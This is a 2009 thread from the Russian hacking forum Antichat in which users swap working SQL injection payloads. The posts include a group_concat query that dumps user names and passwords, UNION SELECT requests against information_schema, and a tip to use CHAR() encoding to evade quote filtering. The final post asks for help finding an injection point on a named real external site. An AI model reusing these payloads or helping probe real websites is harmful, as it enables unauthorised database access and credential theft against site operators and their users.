Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

23.01.2009, 15:35
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме: 1571865
Репутация:
571
|
|
Сообщение от Octave_Parango
Всем привет!
Вывожу информацию:
group_concat(name,0x3a,pass)
Но вывод информации ограничен, через лимит выводится гораздо больше.
Вопрос:
Как вывести всю информацию, без ограничений?
Если нужно выдернуть всех юзеров, а их очень много - использую прогу, для автоматизации процесса.
К примеру - тот же Сипт.
|
|
|

23.01.2009, 15:42
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме: 349682
Репутация:
30
|
|
Всем, спасибо! получилось!
|
|
|

23.01.2009, 17:14
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме: 397889
Репутация:
60
|
|
sql-inj
здравствуйте
http://localhost/view_cat.php?cat=-1+union+select+1,2,column_name,4,5,6,7,8,9+from+in formation_schema.COLUMNS+where+table_name='user'+l imit+1,2
Не выводит ничего!
Хотя запрос вида
http://localhost/school/view_cat.php?cat=-1+union+select+1,2,table_name,4,5,6,7,8,9+from+inf ormation_schema.tables
работатет и выводиться список всех таблиц,в чем моя ошибка?
мне посоветовали перевести в hex
Тогда такой вопрос?
Зачем ?Если скрипт написал я сам для практики и никакой фильтрации там нет!
|
|
|

23.01.2009, 17:30
|
|
Участник форума
Регистрация: 20.08.2006
Сообщений: 199
Провел на форуме: 1074298
Репутация:
131
|
|
kevmen, попробуй table_name='user' заменить на TABLE_NAME=CHAR(117,115,101,114)
да и запросы по разному пути
/school/view_cat.php и /view_cat.php
Последний раз редактировалось BloodyMessage; 23.01.2009 в 17:35..
|
|
|

23.01.2009, 17:34
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме: 253038
Репутация:
9
|
|
Сообщение от kevmen
здравствуйте
http://localhost/view_cat.php?cat=-1+union+select+1,2,column_name,4,5,6,7,8,9+from+in formation_schema.COLUMNS+where+table_name='user'+l imit+1,2
Не выводит ничего!
Хотя запрос вида
http://localhost/school/view_cat.php?cat=-1+union+select+1,2,table_name,4,5,6,7,8,9+from+inf ormation_schema.tables
работатет и выводиться список всех таблиц,в чем моя ошибка?
мне посоветовали перевести в hex
Тогда такой вопрос?
Зачем ?Если скрипт написал я сам для практики и никакой фильтрации там нет!
Попробуй 'user' заменить на ('user')
|
|
|

23.01.2009, 17:35
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме: 397889
Репутация:
60
|
|
BloodyMessage,спасибо огромное)обясни только в чем проблема была?в кодировке? =)
|
|
|

23.01.2009, 17:37
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме: 397889
Репутация:
60
|
|
Сообщение от Gemini12
Попробуй 'user' заменить на ('user')
не работает 
|
|
|

23.01.2009, 17:37
|
|
Участник форума
Регистрация: 20.08.2006
Сообщений: 199
Провел на форуме: 1074298
Репутация:
131
|
|
kevmen, видать ковычки фильтрует
|
|
|

23.01.2009, 17:39
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме: 397889
Репутация:
60
|
|
BloodyMessage,база?
А разве база сама может фильтровать?
Извини,если вопрос глупый
|
|
|

23.01.2009, 17:45
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме: 253038
Репутация:
9
|
|
Не могу нащупать скулю
Код:
http://www.hc.kz/index.php?action=showpart&part_id=-1'
Может кто поможет?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|